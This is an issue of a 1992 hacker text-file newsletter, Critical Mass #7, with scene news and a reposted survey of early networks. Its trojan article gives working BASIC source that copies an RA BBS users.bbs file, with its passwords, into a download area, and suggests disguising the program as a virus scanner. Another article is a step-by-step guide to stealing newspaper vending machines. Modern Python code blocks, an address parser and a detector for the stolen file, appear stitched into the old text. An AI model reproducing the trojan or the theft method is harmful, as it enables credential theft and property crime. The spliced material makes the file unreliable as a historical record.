Critical Mass 7
"It's Alive! It's Alive!"
_____________________________________________________________________________
\~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/
\ Critical Issue # 07 A Technical Text /
\ Mass ~~~~~~~~~~~ File Newsletter. /
\________________________________|____________________________________/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
__________________________
__________ l___________ | ___________l
// \ _______ _____ l|l _____ ______ ___
// /~~~~~~~\_\ l \ l l l|l l l // \ _ l l
// / l [] / ~l l~ l|l ~l l~ // /~~~\_\ / \ l l
<<<< ritical l / l l l|l l l // / / \ l l
\\ \ l < l l l|l l l <<<< / ___ \ l l
\\ \_______/~/ l l\ \ l l l|l l l \\ \____/~/ / / \ \ l l_____
\__________/ l__l \_\ l___l l_l l___l \_______/ /_/ \_\ l_______l
==--> ==-->
____ __ ____ ==--> <03/26/92>
l \ / l ass ==-->
l \ / l __ ______ ______
l \ / l / \ / \ / \ A Technical
l l\ \ / /l l / \ / /~~~~~~ / /~~~~~~ text file newsletter
l l\\ / l l / ____ \ \ ~~~~~~/ \ ~~~~~~/ ~~~~~~~~~~~~~~~~~~~~
l l \\____/ l l / / \ \ ~~~~/ / ~~~~/ / Issue: 7
l l l l /_/ \_\ /~~~~ / /~~~~ /
~~~~ ~~~~ ~~~~~~ ~~~~~~
Critical Mass Technical Newsletter is free to those who wish
to gain in further knowledge of topics of Telecommunications,
Datacommunications, Computer and Phone Security, Software and other
forms of piracy, explosives, and other forms of not widely known or
talked about topics.
All articles are totally original, unless stated otherwise.
We will not accept unoriginal, plagiarized articles, or articles
that contain false information. We accept articles from anyone who
is willing to follow these criteria, as long as the editors, writers
and S.A.O.O. members feel that the article is worthy to print.
We encourage all to download these files and pass them on
freely to others as long as credits of the editors, writer or
S.A.O.O. is not modified in any way.
There is no set date for release issues, but we attempt to
put them out as frequently as possible.
We now also offer BBS's outside the Tallahassee area to get
on our BBS listing. If you decide to get on this list, we will send
you issues as soon as they are produced.
If you have any questions pertaining to an article, please
leave E-Mail to the author of the article. If you cannot get in
contact with the author, please leave "The Beaver" mail at the
following BBS's, he will try to put you in touch with the author,
and/or try to answer your questions.
The Beaver
The Back Door BBS BlackHawk BBS
(904)997-6127 (904)421-9255
Warrior's Retreat Wizard Spell Book
(904)422-4606 (904)574-3447
Tower Of Power
(904)668-6745
Or, if you have access, one of the following S.A.O.O. BBS's.
Hacker Wholesale <904>PRI-VATE
Speed Shop <904>PRI-VATE
S.A.O.O. Main <904>PRI-VATE
If you wish to become a member of the S.A.O.O. please leave
The Beaver E-Mail, where he will send you an application for you to
fill out. From there, local S.A.O.O. members in your area will
consider you and take a vote on if at that date you can become a
member.
We are always looking for experienced and even
non-experienced p/hackers to join. Only after a background check and
the vote will you be let in. If you fail to get in, do not be mad,
we have turned down many people. Simply wait, improve the reasons
that you were not let in, if possible, and in the mean time, learn.
We are also looking into other remote S.A.O.O. support
boards to net with and share information with. In the event that
you would like to support a S.A.O.O. chapter in your area, please
contact a member of the Tallahassee S.A.O.O. Benefits do come.
Currently we are looking into mostly the Florida region,
from Jacksonville To Miami, but are willing to reach into other
areas.
Head Chief And Writer - The Beaver
Editor - Flea
Members - <S>ilicon <A>luminum <O>xidation <O>rganization.
This Issue's Articles Include:
I. - Local News
By The Beaver.
II. - Network Descriptions
By <Unknown>
III. - Simple RA BBS User.bbs Trojan
By The Beaver
IV. - How to support yourself doing little to nothing.
By The Beaver, Shadow Hacker, D.M., Section 8, etc
V. - Beav's FTP Batch Hacking Method <For VAX/VMS>
By The Beaver
VI - The SAOO Generic Telenet Scan Part II
Scanned By The Beaver.
VII - Brief description on really hiding directories
By Dementia Meister
VIII - Down and dirty chemistry. Part I
By Art Phish
IX - Closing notes.
By The Beaver
__________________________________
Local News
The Beaver
_______________________
Hello, and welcome to yet another issue of Critical Mass.
Man has it been a great year for hacking for fellow S.A.O.O.
members in this area, but we will not go into that right now........
As you might recall, in the first CM, I wrote an editorial about
the downfall of fun and interesting BBS's that allow you to speak freely.
I am now happy to say that this is changing rather fast. I have seen so many
pirate boards, both private and public, pop up in this area that it almost
brings a tear to my eye. This raises a point.....
A new BBS echo has hit the ole town of Tallahassee. It is called
"[Unregistered] Net", and the primary topic is on Piracy, Hacking, Phreaking,
and pretty much any topics that are not talked about in the normal realm
of people. It IS however a totally legal net, so basically this means that
there are NO stolen accounts/codes/etc traded on this particular net. If
you would like to become a part of this net, please contact 'The Beaver'
or 'Section 8' pertaining to information on the net and how to get on. There
are currently 5 boards on the net <Actually as of this writing, the net is
not up yet>, but we expect three or four more to be on in the near future.
If interested, mail one of the above, and all information will be
sent to you. There is also the SAOO net, which will be coming into action
soon. In order to be a part of this net, one must be either an active member
of the SAOO and/or support a SAOO support BBS. Please contact one of the
above for further information.
It looks as if the ole Upper Deck will be down longer than expected.
So don't call looking for it. When it does come back up however, we will
have more storage so that we can carry more files online.
The S.A.O.O. Telenet Generic Telenet Scanner Version 1.1i Beta is
out, though this is nothing to really brag about. It works, but as stated
it is a beta version. As you may have noticed, it came with your issue of
Critical Mass#7. As of this time, you are slightly ahead of people who are
downloading version 1.0i beta off of Tallahassee BBS's, in that v1.1i beta
contains a bug fix. See the Doc's for more information! Also, feel
privileged.
Currently, there is some talk also about having a local Computer
convention of sorts. What is being looked into right now is to have a
basic get together of modem users in our area, and hopefully along with
outsiders as well. What is desired is a two day long event in which
users get together and discuss several topics, along with speakers in all
fields, including computer security. What hopes to be arranged is a
'conference' of sorts, for speakers ranging from Microsoft to local DEC,
FCIC, FDLE and possibly FBI computer security officials. This is in its
very early planning stages. If you wish to help out the efforts, please
contact your nearest S.A.O.O. member!
Welp, it looks like ole Abigail Natias is leaving the Tallahassee
area and is heading for the Ft. Walton Bch area. He has been a fellow
SAOO member since it was founded. Never fear though, he remains in the
SAOO, and hopefully, within the next few months, a new SAOO chapter will
be opening within that area.
There is a new BBS on internet that you might find interesting. It
is pretty much an underground BBS, so to obtain information on it, please
contact "The Beaver" at one of the given BBS's.
_________________________________________
Network Descriptions
By <Unknown>
___________________________
Editor Note:
This was originally a message posted on a BBS in Ft. Walton Bch
Florida. Unfortunately, the author is unknown to us, so we
cannot give him/her credit. Also, this text is somewhat old
so, not all the information is accurate.
- The Plethora of Networks -
Since I have been at an ARPANET site for about three years, and a USENET
site for the same amount of time, I think I can comment on some of the
Networks that exist out there. Particularly since Berkeley has become
a gateway for several of them.
ARPANET
-------
Brought to you by the fun folks at DARPA, it was one of the very first
experiments with computer networking, and certainly the first on a national
(and later international) scale. It is centrally controlled and implicitly
routed (i.e. the network figures out how to get from point a to point b).
To join, you have to have a gov't sponsor and it is for the execution of
official gov't business & research. (sure it is...)
In so far as I am aware, all links are faster than 9.6Kbaud, and a good
number of them are 56Kbaud. All appear to be dedicated. Number of sites is
somewhere between 250 and 300. If you choose to count the whole internet,
things get a little bigger. Anyone have any ideas about the number of
internet sites? Three basic services are offered by the ARPANET:
FTP - File Transfer Program (fetch/send files anywhere)
telnet - Interactive access to other hosts on the network
MAIL - Electronic Mail
MILNET
------
Stepchild of the ARPANET (or perhaps goosestepping child?), MILNET is where
the military sites gather to do the same things ARPANET does, without
disruptions caused by networking research (i.e. it is a production
version of the ARPANET). It split from the ARPANET in October of 1983.
CSNET
-----
This is a network funded (initially, although they will be self-sufficient
later on) for the purpose of Computer Science Research by the National
Science Foundation (and probably many others). By 'self-sufficient', I mean
that the individual member sites of CSNET will pay the full cost of
central control, administration, and ARPANET access. Last price I was
quoted was $30K/year. Presently seems to be between 50-100 sites.
I'm a little shaky on what this network has in terms of services, but
here goes: Services seem to be limited to MAIL, but FTP is coming. Mail is
handled with the MMDF software, which operates over the phone. There are two
ARPANET gateways: UDEL-RELAY and RAND-RELAY. These two sites handle the
phone traffic to the rest of the net (??) from the ARPANET. Network
addressing is implicit. To get to a CSNET site from the ARPANET:
mail person.site@RAND-RELAY (or UDEL-RELAY)
BITNET
------
This is a network of IBM hosts, and seems to be built along the same lines
as the ARPANET (implicit addressing, dedicated lines, central control) but
not all the sites have the same capabilities. Services supported: MAIL,
and FTP (for those sites that have RSCS). Presently is about 50-60 sites.
Founded by CUNY, after they got IBM to cough up the software that is used in
the IBM internal VNET. I have no idea how fast it goes. Scope: national. To
address someone on the BITNET from the ARPANET:
mail person%site.BITNET@BERKELEY
BERKELEY's mailer converts this to
G:SITE=PERSON
and it gets sent to UNIX G (in the UCB Computer Center), which in turn sends
it to the IBM 4341 (UCBVMA on the BITNET), and from there it goes where
it's supposed to...
DEC Engineering NET (E-NET)
---------------------------
This is DEC's internal network of engineering machines (now you know
where VMS comes from!). It is centrally controlled, semi-implicitly
routed (they are converting from an explicit routing scheme) and is
composed of somewhere between 2000 and 2100 sites. Primary service seems to
be MAIL, but there is no doubt some form of FTP as well. Speed seems to be
somewhere in the higher ranges (4800+ baud), but I infer this from speed of
mail propagation alone. This network is international in scope, with
several European sites. For ARPAnauts, you can mail to the E-NET:
mail decwrl!rhea!site!person@BERKELEY
The site 'decwrl' talks to 'ucbvax' with UUCP. 'ucbvax' is the ARPANET site
BERKELEY. The mailer at decwrl converts address syntax to
RHEA::SITE::PERSON
and away it goes...
There is a DEC site on the ARPANET (DEC-MARLBORO) which appears to do
gatewaying duty now and again, but by hand only. This would be an ideal
point to establish a real gateway (hint, hint...)
(and now, for the grand finale...;drum roll please=)
UUCP/USENET (ta da!)
--------------------
These two networks are forever intertwined, and from the ARPANET
point of view, there is little difference between the two. By the
nature of the beast they must be discussed together. UUCP is an acronym
for Unix-to-Unix Copy, a file transfer and remote execution facility which
operates over a direct line (max 9600baud) or over the phone lines
(typically 1200 baud).
Mail is transmitted through the network on a pass it on basis, and at
present, only the mail software knows how to transfer stuff beyond a site's
immediate neighbors. The UUCP network exists because some of my neighbors
talk to some of your neighbors, so through them we can send mail to each
other. The network has no central control, and no one knows how many
sites there are, or how far the network extends. Anyone can join the
network, all it takes is a UNIX system, and another site willing to
talk to you. After four months of traffic analysis, I have found just
over 2000 UUCP sites.
USENET is a subset of the UUCP network. On top of the existing UUCP
software, sites in this network run 'netnews', which is a bboard system,
also on a pass it on basis. Imagine a bboard system in which you post
something, and you pass it on to the other USENET sites you talk to (and so
on, and so on, ad nauseam), until the whole network has seen the item you
posted. The discussions are separated by topic, and if you thought that the
ARPANET had a wide range of mailing lists, the USENET has currently
somewhere between 150-200 active network wide newsgroups discussing
things as esoteric as UNIX bugs to mundane things like cooking. There are
approximately 600 USENET sites covering the continental US, Canada,
Europe, and Australia. There is a USENET directory kept by Karen
Summers-Horton (cbosgd!map@BERKELEY), and it is posted monthly on the first
of the month to net.news.map.
The anarchy of the network is interesting. Among other things, it
means that you must have an educated network community (ever try to educate
people at 600 sites??) and punitive actions are very nearly impossible on
a unilateral scale. It makes path routing difficult, however. The
directory includes information about links that a particular site has, but
it is up to the site to provide and maintain that information. Since the
network is in a constant state of flux, it is very hard to map the whole
thing. Unlike the ARPANET, usually the best you can do is get a snapshot.
(finis)
Now. Where I err, please correct me. Most of the networks mentioned get
HUMAN-NETS in one form or another, so I expect that corrections will filter
in over the next few days. However, on the whole, I don't think I have missed
anything major.
For the networkingly confused, I hope I have been of some help. This got
just a touch longer than I had anticipated.
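The gateway address forms quoted in the message above can be written as a small parser. This is an added example, not part of the original post or of any mailer it describes; the names `Route` and `classify` are this example's own, only the conversions the text spells out are implemented, and rejecting a local part that mixes routing operators is this example's policy.

```python
from dataclasses import dataclass

CSNET_RELAYS = {"RAND-RELAY", "UDEL-RELAY"}   # the two relays named in the text


@dataclass
class Route:
    network: str    # destination network as named in the text
    gateway: str    # ARPANET host that relays the message
    person: str
    site: str
    rewritten: str  # address form past the gateway ("" where the text gives none)


def classify(address: str) -> Route:
    """Map an ARPANET-side address to the network and rewritten form described above."""
    local, sep, gateway = address.rpartition("@")
    if not sep or not local or not gateway:
        raise ValueError(f"no gateway host in {address!r}")
    gw = gateway.upper()

    # Policy of this example: a local part that mixes '!', '%' and '@' has no
    # single agreed reading, so refuse it instead of guessing a route.
    if len([op for op in "!%@" if op in local]) > 1:
        raise ValueError(f"ambiguous mixed routing operators in {address!r}")

    # E-NET: decwrl!rhea!site!person@BERKELEY  ->  RHEA::SITE::PERSON
    if "!" in local:
        hops = local.split("!")
        if gw == "BERKELEY" and len(hops) == 4 and all(hops) and hops[0].lower() == "decwrl":
            _, area, site, person = hops
            decnet = "::".join(part.upper() for part in (area, site, person))
            return Route("E-NET", gw, person, site, decnet)
        raise ValueError(f"unrecognised UUCP path in {address!r}")

    # BITNET: person%site.BITNET@BERKELEY  ->  G:SITE=PERSON
    if "%" in local:
        person, _, rest = local.partition("%")
        site, dot, net = rest.rpartition(".")
        if gw == "BERKELEY" and dot and person and site and net.upper() == "BITNET":
            return Route("BITNET", gw, person, site, f"G:{site.upper()}={person.upper()}")
        raise ValueError(f"unrecognised %-route in {address!r}")

    # CSNET: person.site@RAND-RELAY (or UDEL-RELAY); no rewritten form is given.
    if gw in CSNET_RELAYS:
        person, dot, site = local.partition(".")
        if dot and person and site:
            return Route("CSNET", gw, person, site, "")
        raise ValueError(f"expected person.site before @{gw}")

    raise ValueError(f"{address!r} matches none of the gateway forms in the text")


if __name__ == "__main__":
    for sample in ("person.site@RAND-RELAY",
                   "person%site.BITNET@BERKELEY",
                   "decwrl!rhea!site!person@BERKELEY"):
        print(sample, "->", classify(sample))
```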
A bit more info on Digital's ENET
First I'd like to thank the author of the compendium on networks.
And second, I'd like to give a little more information on the Digital ENET.
It is composed of systems running our DECNET software products, first
introduced about nine years ago.
DECNET is much more than a mail network. It is a product built on a
layered network architecture (DNA) with lower, non-programmer accessible
data-link and routing layers, and higher, programmer accessible, session
layers.
It is similar to the ISO model on open systems interconnect. Since it is
older than that model, it does not correspond exactly, but will, more and
more, as time goes by and as the worldwide networks develop.
At the data-link level it can use synchronous or asynchronous lines of
any speed running DDCMP, public network lines running X.25, parallel
links running protocols specific to those devices, and Ethernet. Using
gateway products it can create gateway links into an IBM SNA network.
At the user accessible layer, it is possible for any program to open a
transparent, full-duplex, channel to any other program on the same or any
other node in the network. Programmers can take advantage of this "network
logical link" to build any application they wish.
Various Digital supported protocols running on logical links are
host-to-host terminal connections, allowing a user at any node to act as
an interactive terminal on any other node, Mail, the Data Access Protocol,
(see next paragraph) and several others.
The DAP protocol is used to copy files, but it is much more than a file
copy protocol. It permits a program on any system to access a file on any
other system as though that file were a local file. In fact, VMS and RSX
using the DAP routines buried in RMS permit a nodename to be simply a part
of a file spec used by any program.
DECNET does a bit more than implicit routing; it does dynamic path routing.
As a result, given sufficient alternate paths, the loss of an
intermediate node does not affect the operation of traffic currently routing
through that node. Dynamic path routing was first made available in
DECNET Phase III, offered for sale almost five years ago.
For example, since our network has three transatlantic links, a few
months ago, we had a serious failure of the links between Massachusetts and
the remainder of our engineering and marketing headquarters 30 miles to the
north in New Hampshire. But due to the fact that some of our transatlantic
links go into New Hampshire and others into Maynard, we did not immediately
notice the problem. Things got a bit slower, since we were no longer using
several 56Kbps links but were pushing all traffic through some 9600bps links
to the U.K., down to Geneva, and back. The reason there occasionally appears
to be some implicit routing in our node strings is that the Phase III
version of DECNET had a maximum of 256 addresses. This restriction has been
lifted in Phase IV. However, as a result of the restriction, it was
necessary for us to partition our network.
Reassigning node numbers will not be complete for several months, and not
all systems will upgrade, so there may be a few systems which require one
intermediate hop from RHEA. Many of these will have definitions on RHEA
making that transparent to the sender (though a recipient would see the
hop). The rest should be directly addressable from RHEA, whether located
in the U.S., Canada, the Caribbean, Europe (13 countries now), the Middle
East, the Far East, or Australia. (Remember, IBM is the only computer
manufacturer larger than Digital.)
Compliments to Mr. Fair - an excellent summary article. Would that Human-Nets
had more such.
To expand on CSNET: It is currently funded by the NSF, and expects to
become self-supporting during the next few years, based on member fees. These
fees are:
$ 30,000 - commercial sites
$ 10,000 - government and not-for-profit
$ 5,000 - educational
These fees may be reduced by petitioning for a reduction in the
case of small outfits, and are lower for people who already have a net
connection via Arpanet.
The CSNET membership list as of Dec. 1
shows:
85 Phonenet sites
6 Telenet sites
18 Arpanet sites
4 CSNET-owned hosts
Not all of these sites are operational yet, though most are. Phonenet sites
are served by two Relay machines, which call them up nightly to exchange
mail. Text files may be automatically transferred using MMDF-based
mail-receipt programs, though this is obviously not the best way to do
business. Bandwidth here is limited by the 1200-baud phone lines as well as
by the capacities of the Relays. Mailing-list stuff can be handled OK,
but Usenet traffic breaks the Relays by sheer load.
Telenet sites run TCP/IP on top of X.25 virtual circuits, using software
developed for CSNET at Purdue. Personally I think this is hot stuff.
If your phone bills are $1500/month, you can run equivalent traffic over
Telenet for about $1200/month, last time we figured it out. And, you get
full Internet connectivity and services into the bargain. Because the
drop lines from Telenet to the host are really only 9600, 4800, or 1200
baud dedicated phone lines, instantaneous bandwidth is not as good
as Arpanet, but it's not bad. And, you and the rest of the world will be
hard-put to tell that you're not on Arpanet directly, except you don't
have to deal with the DoD. This software really works, and works well.
Arpanet sites run standard Arpanet software - no change.
In addition to simple net connectivity, CSNET brings the
benefits of centralized network management. Basically this means that
if your mail isn't moving, you have experts to scream to, and they really
will work hard to fix the problem. There are other benefits such as
ongoing mail system development, an automatic nameserver, and so forth.
Management of CSNET has recently been transferred away from the contractor
committees which built the net to a newly-formed Executive Committee,
which is overseeing the move from a research to a service organization.
The two relay machines are moving to BBN - it's cheaper and easier to run a
single computer center and communicate via WATS lines than to spread out the
Relay operations.
Just to clarify something... DECNET is the name of a product sold by Digital
which any customer can use to build their own network.
DECNET is used to build Digital's internal network. The internal network
name has been a hotly debated subject (what's in a name?) but the most
commonly used name is the ENET, since the largest internal use was within
Engineering.
Now the whole company is being interconnected, and Engineering
Network is not really an appropriate name. But the E in ENET doesn't
necessarily have to stand for Engineering.
We think it can stand for Everything, Employee, Everywhere, or whatever
anyone wants it to stand for.
The lack of any serious central control (other than a nodename
registry) makes things like this not really matter.
Here's a network you left out: the XEROX Internet. Most outsiders tend to
overlook the XEROX Internet, for various reasons:
1) only a small proportion of the traffic is gatewayed to or from other
networks;
2) what little gatewaying there is gets done almost invisibly;
3) the name difficulty. (I'm told that XEROX used "Internet" first, but that
doesn't matter much now.)
The XEROX Internet only has about 2000 users, but it is widely distributed,
with users in Europe and Japan.
The mail transport mechanism within the XEROX Internet is called
Grapevine. Grapevine addresses look like "<user>.<registry>". If the
registry you're sending to is the one you are in, you can leave it off, and
the address becomes merely "<user>". Registries are geographic - the two
largest are "PA" (Palo Alto), for Northern California, and "ES" (El
Segundo), for Southern California.
To send mail in from the ARPAnet, the address looks like:
"<user>.<registry>@PARC-MAXC".
If the registry is PA, you can leave it off, giving "<user>@PARC-MAXC".
This is what I mean by invisible gatewaying - to outsiders, it looks
like all 2000 of us Xeroids receive our mail on poor little PARC-MAXC. Not
so - it's just a gateway. I think the source of the confusion is that people
are used to explicitly specifying a host for the mail to be delivered to,
as well as a user on that host. Grapevine's mail servers are politely
invisible.
Sending mail out to the ARPAnet is as easy as pi. "ARPA" is just another
registry, so I just say "<user>@<host>.ARPA". Or if I'm really
lazy, I can just say "<user>@<host>", since anything with an atsign
automatically goes to the ARPAnet.
In addition to the networks previously described, there are five public data
networks actively serving the US and more in the works. The five national
PDNs are all common carriers, like Greyhound - that is, anybody who pays
the fare can use them. They all provide an X.25 interface, which gives
a virtual circuit service - there is as yet no international standard for
mail or FTP. All provide a virtual terminal capability via the X.3/X.29
PAD standards. They all compete vigorously for business, and I'm sure
I'll hear about it immediately if I have left out anybody's capability.
Here (in alphabetical order) are the five established PDNs:
ADP Autonet
175 Jackson Plaza
Ann Arbor, MI 48106
(313) 769-6800
Besides the US, has satellite links to London, England and Delft, The
Netherlands. Maximum internal speed is 9600 bps. Nodes are PDP-11s with
KMC-11 front end microprocessors. Internal protocol was described to me
as derivative of the old ARPAnet protocols.
CompuServe Incorporated
Network Services Division
5000 Arlington Centre Blvd.
P.O. Box 12
Columbus, OH 43220
(614) 457-8600
Internal speeds to 56k bps. Nodes are PDP-11s with 6809 microprocessor front
ends. Internal protocol is DDCMP.
GTE Telenet Communications Corp.
8229 Boone Boulevard
Vienna, VA 22180
(703) 442-1000
Internal speeds to 56k bps. Nodes are arrays of 6502s in a redundant, load
sharing configuration. Internal protocol conforms to CCITT
Recommendation X.75. Supports automatic recovery of virtual circuit
when a node fails during a call. Built by some of the folks from BBN who
built the ARPAnet originally. Provides a mail service called Telemail.
Tymnet, Inc.
2710 Orchard Parkway
San Jose, CA 95134
(408) 946-4900
Internal speeds to 56k bps. Nodes are arrays of "Tymnet Engines" in a
redundant, load sharing configuration. The Tymnet Engine is a Tymnet-built
32-bit processor derived from the Interdata 732, re-engineered for
extremely high MTBF. Internal protocol is a unique Tymnet design which
repacketizes inside the network and does flow control at the byte level,
like TCP. Supports automatic recovery of virtual circuit when a node fails
during a call. Provides a mail service called OnTyme.
Uninet
United Telecom Communications, Inc.
2525 Washington
Kansas City, MO 64108
(816) 221-2444
Internal speeds to 56k bps. Nodes are Modcomp 7830s. Internal protocol is a
Uninet-designed virtual circuit protocol, on top of HDLC.
In addition there is, of course, the new AT&T offering, NET/1000. Nodes
consist of arrays of VAXen with a Series/I for line handling. They see
the function of their network as storing information, rather than just
forwarding it like the other networks. The internal protocol is X.25, but
they don't support an X.25 user interface! (No, I don't know why). For
further information, call Mr. John M. Finn, their San Francisco account
executive at (415) 452-7292.
Graphic Scanning and Computer Sciences Corp. are in the process of spinning
off their internal networks, as GraphNet and InfoNet respectively I
believe. There will probably be X.25 interfaces, if they don't exist
already.
GE Information Services Company has an internal network called MARK*NET.
There is not as yet an X.25 interface to it.
And, how could I forget, the State of Utah boasts its own Public Data
Network! It is called ComWest and is being spun off by Blue Cross/Blue
Shield of Utah, which needed a good way to get claims data from places
like Panguitch, Utah up to Salt Lake City. The internal circuits are leased
from Mountain Bell (no, they're not barbed wire, skeptics) and run up to
9600 bps. Nodes are Dynatech Packet Technology Multi-Switch.25 packet
switches, which are based on the Z80 micro. There are several sites besides
BC/BS, one of them being the University of Utah DECSYSTEM-20.
Outside the US, there are public data networks operating in about forty
foreign countries, basically the ones that are industrialized. We have a
user who logs in regularly from Stockholm via the Swedish PDN <->
Telenet <-> ComWest. He says he gets good response.
_______________________________________
The Simple RA User.BBS Trojan.
By The Beaver
_____________________________
Member S.A.O.O. <Silicon Aluminum Oxidation Organization>
The entire idea behind the code is simple. To get the User.BBS file,
which contains all the users and their passwords <Along with other interesting
facts>. It is currently set for RA, but can probably be modified for Qbbs, or
what not.... Here is the little "ho-down" on the program and its steps.
1> Find RA's User.bbs file, using the program "dirscan.com"
Once found, store the path.
2> Find a file that you are SURE is in a files transfer area. Take for
instance, if you know that there is a file in the Utilities area
called "bigdeal.zip", and you want the User.BBS file to go in
that directory, we search for "bigdeal.zip", and store the path
it came from.
3> copy the User.BBS to the file transfer area as something
non-suspicious. So if it copies, as in our example, to the utility
directory, make it something like "list.com" when it is copied.
<NOTE: Make sure that the "utility" does NOT actually exist!>
4> Call everyday and do a "raw directory" and look for the file.
Since the files.bbs is not modified, it will not be seen on a
normal file list, so a raw is required. If raw-directory is not
supported, then simply go on everyday and try to download
the name it is stored under. In our case, "list.com". If it is
there, whether or not it is in a standard file list, it can be
downloaded.
The "diskscan" program is nothing more than a utility like, "where".
Basically all it does is find files for you. This should not be a
very hard utility to find.
Once you obtain the user file, you should have no problem with a
text editor going through and determining what the usernames and
passwords are, along with other information.
If you are one of those neat types, you can get RA or the utility
"rauser.exe" and rename your pseudo utility back to "users.bbs" and
with a few little modifications, you can use the utility that looks
through that and gathers the fields. At any rate, I hope you enjoy this,
but it really was not that hard to do.
Actually, Dementia Meister is writing a better version of this
in pascal, but I am sure you can figure it out and convert it to
whatever language you so desire.
Also, I would like to note the fact that this is not
a very easy bug to cure, and I see no way for sysops
to protect themselves from the use of this method, other
than having a careful eye. <At least not right off anyway>.
Member S.A.O.O. < Leave mail on membership >
< Only the worthy hack's >
< need apply! >
---==<Beaver>==---
' This is version 1.0 of the RA user.bbs trojan horse.
' Object.... To find users.bbs and copy it to a download
' area, so that it maybe download, thus all usernames and passwords
' are obtained.
'
' This program uses "dirscan.com" file finder.
'
' Written By The Beaver
SHELL "dirscan users.bbs >me" ' Find User.bbs with full path
' and put it in a file called
' "me".
OPEN "me" FOR INPUT AS #1
INPUT #1, userbbs$ ' Grab Path out of the file.
CLOSE #1 ' okay, we are done.
KILL "me" ' kill the "diskscan" output file
SHELL "dirscan (filename) >me" ' Now find the file transfer area.
' we search for a file we KNOW is
' there.
' Replace the (filename) with a
' file that you know is in the
' download directory
OPEN "me" FOR INPUT AS #1 ' Grab path out of file again.
INPUT #1, filetrans$ ' Okay, got it!
CLOSE #1
KILL "me" ' kill the "diskscan" output file
FOR i = LEN(filetrans$) TO 1 STEP -1
IF MID$(filetrans$, i, 1) = "\" THEN a = i: GOTO step2
NEXT i
step2:
filepath$ = LEFT$(filetrans$, a) ' okay, we got the file area
' path we need. Now do the
' dirty deed.
SHELL "copy " + userbbs$ + " " + filepath$ + "neatgame.exe >me"
KILL "me" ' the ">me" keeps output from going to the screen
' <the "1 file copied" message>. All output to
' con. is redirected to a file. We are killing this
' file
' Also, make the "neatgame.exe" to what ever file
' you desire to call it.
' From this code, I advise a few things. This is only raw source.
' Add in a few nifty things, so it appears as a virus scanner or
' maybe a disk doctor or something. Just add in print statements
' here and there. Plus, as some sort of disk utility, all the hard
' disk access can be explained!
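A check a sysop can run for the copy this program leaves behind: compare every file in the download areas against the user base by content, so a renamed copy such as "neatgame.exe" is still found. This is an added example, not code from the newsletter; the directory layout, the 64-byte fingerprint length and the sample data are constructed assumptions.

```python
import hashlib
import os
import tempfile

SAMPLE_LEN = 64  # leading bytes of the user base used as a fingerprint (assumed length)


def classify(path, base_data, base_hash):
    """Return 'identical', 'embedded' or None for one download-area file."""
    with open(path, "rb") as fh:
        data = fh.read()
    if hashlib.sha256(data).hexdigest() == base_hash:
        return "identical"            # byte-for-byte copy under another name
    if base_data[:SAMPLE_LEN] in data:
        return "embedded"             # user base appended to or wrapped in another file
    return None


def find_userbase_copies(userbase_path, download_root):
    """Map relative path -> verdict for files that carry the user base content."""
    with open(userbase_path, "rb") as fh:
        base_data = fh.read()
    if not base_data:
        return {}
    base_hash = hashlib.sha256(base_data).hexdigest()
    base_real = os.path.realpath(userbase_path)
    hits = {}
    for dirpath, _dirs, files in os.walk(download_root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.realpath(path) == base_real:
                continue              # the real user base itself
            try:
                verdict = classify(path, base_data, base_hash)
            except OSError:
                continue              # unreadable file: skip, do not abort the sweep
            if verdict:
                rel = os.path.relpath(path, download_root)
                hits[rel.replace(os.sep, "/")] = verdict
    return hits


def demo():
    """Build a constructed BBS tree and run the sweep over its download area."""
    with tempfile.TemporaryDirectory() as root:
        bbs = os.path.join(root, "ra")
        games = os.path.join(root, "files", "games")
        os.makedirs(bbs)
        os.makedirs(games)
        # Constructed stand-in for users.bbs: 20 fixed-size records.
        userbase = b"".join(b"USER%03d" % i + b"\x00" * 24 for i in range(20))
        samples = {
            os.path.join(bbs, "users.bbs"): userbase,
            os.path.join(games, "neatgame.exe"): userbase,
            os.path.join(games, "bundle.dat"): b"MZ" + b"\x90" * 10 + userbase + b"tail",
            os.path.join(games, "readme.txt"): b"New files this week\r\n",
        }
        for path, content in samples.items():
            with open(path, "wb") as fh:
                fh.write(content)
        return find_userbase_copies(os.path.join(bbs, "users.bbs"),
                                    os.path.join(root, "files"))


if __name__ == "__main__":
    for rel, verdict in sorted(demo().items()):
        print(verdict, rel)
```

Run from the event scheduler after each upload is processed, this turns the "careful eye" into a repeatable sweep; it only matches content that is copied unchanged.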
_______________________________________________________________
How to support yourself doing little, or nothing
at all.
By Bored SAOO Members Late One Night
___________________________________________
Here we will discuss the infamous "Democrate Fraud"
method.
I take no resposiblity for any prosecutions, damages,
injuries, etc. Attempt at your own risk...
Though, this method has never been tested, along with myself
and five fellow SAOO members thought of this while sitting
around a dead Democat Paper Dispenser. Simply follow the
following steps....
1> Getting the Machine
Get you hands on a Democat Paper Machine. To do this, take
three of your fellow comrades in one vechicle, with a
large back seat/trunk <A Van is ideal> and approach
a nice, lonely paper machine. Get two people to grab it
while one watchs out. If the machine is bolted down,
use bolt cutters.
2> Opening it
Cut the lock off that secures the brace pin <Located
near the top on the right hand side on most machines>.
Remove the brace pin and "open de hatch". Remove the
money. Replace the lock <that secures the brace pin>
and secure with new lock.
* NOTE: Do not beat it open! It will only serve as a
nice plant stand, or as it was at Abigail's house,
"That thing in the corner."
3> Re-distribution of wealth
There is still more money to be made. Now, take the
paper machine <Now with YOUR lock on it> and drop it
off in a somewhat populated area. Not in a place so
populated that the real paper men will see it, but
in a back area <I.E. - By a pool near apartments,
in a laundry room in apartments>. In other words,
where the real paper man won't see it.
Now, every morning goto a paper stand <A legit stand that
is!> and put in your 50 cent <$1.50 on Sundays!> and
remove ALL the papers.
Now return to YOUR paper stand and put in all the papers
you just got into your paper machine with your lock on
it!
Now, every night, return and unlock your paper stand and
collect your money! Repeat this process and distribute
your stands around as much as possible. Start this entire
process over again....
4> Closing notes.....
Though past experiences of certain members of the SAOO
<Shadow Hacker, Abigail, and Dementia Meister>, they
got a whole $5.00 on a stolen machine <That they beat
open, because of lack of bolts cutters>. The machine
they got was in a area not to populated.
We estimate that a real popular area, you could maybe
get out of one box $15 dollars. This is a problem,
the paper people already got boxes there. We figure that
a box in a more ideal area for you will probably will
average $7.50 on weekdays.
Sudays are another story. You might make a possible
$20 dollars for that day. So for one box, in a decent
location, adverage is......
